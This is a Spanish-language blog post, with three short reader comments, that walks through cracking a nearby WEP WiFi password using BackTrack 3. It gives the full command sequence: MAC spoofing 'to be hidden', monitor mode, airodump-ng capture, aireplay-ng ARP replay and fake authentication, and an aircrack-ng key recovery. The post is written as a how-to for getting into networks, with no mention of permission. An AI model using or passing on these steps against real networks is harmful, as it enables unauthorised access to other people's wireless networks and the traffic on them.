El día de hoy, vamos a ver como sacar contraseñas WiFi, en este caso una contraseña con encriptación WEP.
- Lo primero que debemos hacer es descargar Backtrack 3. Descagar Aquí
- Luego grabamos la imagen en un CD, para esto podemos utilizar un programa gratuito como ISO recorder 2.0. Descargar Aquí
- Una vez con el cd grabado, reiniciamos el computador y ponemos el cd para que arranque BackTrack 3.
- Luego abrimos una consola (shell) con el icono que está al lado de la “K” de la esquina inferior izquierda.
- Detenemos nuestra tarjeta de Red (En este caso una Atheros por lo tanto es ath0)
Escribimos: airmon-ng stop ath0
- Para continuar, cambiamos nuestra MAC (Media Access Control), para ser “ocultados”.
Escribimos: macchanger -m 11:22:33:44:55:66 wifi0 - Iniciamos nuestra tarjeta de Red en modo Monitor.
Escribimos: airmon-ng start wifi0
- Ahora nos aseguraremos que todo vaya bien, revisaremos la MAC cambiada y que la tarjeta esté en modo Monitor.
Escribimos: iwconfig
- Ahora, a revisar si hay redes cerca nuestro.
Escribimos: airodump-ng wifi0 - Anotemos datos muy importantes de la pantalla anterior, como lo son:
- La MAC de la red (BSSID)
- El canal por donde se transmite la red WiFi (CH)
- El nombre de la red (ESSID)
- Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas.
Luego escribimos: airodump-ng –channel X –write XXX ath0
x= Canal (CH)
xxx= Nombre para guardar el archivo con información, pongan cualquier nombre, en este caso “pass” Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0
- Ahora abrimos otra ventana de consola (Shell).
Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0
- Volvemos a abrir otra ventana de consola (Shell)
Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0
- Ahora debemos esperar a que se obtenga la información suficiente como para saber la contraseña de la red, para esto tenemos que esperar a que los ARP sean altos (más de 50.000).
- Una vez que tengamos suficiente información (lo sabrás con experiencia, muchos intentos, todo depende de la dificultad de la contraseña), cancelamos lo que teníamos andando presionando CTRL+C en cada consola (Shell).
- Luego iniciamos otro programa para que desencripte la contraseña.
Escribimos: Aircrack-ng pass-01.cap
Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado.
3 comentarios:
ola que tal, para el caso de una windows se sigue los mismos pasos?, muchas gracias por tu respuesta, t lo agradezco
pero lo malo es q no deja
para un portatil tengo que seguir los mismos pasos.por favor escribeme el link del programa para descargarlo y escribe los pasos en forma de lista. ok gracias.
Publicar un comentario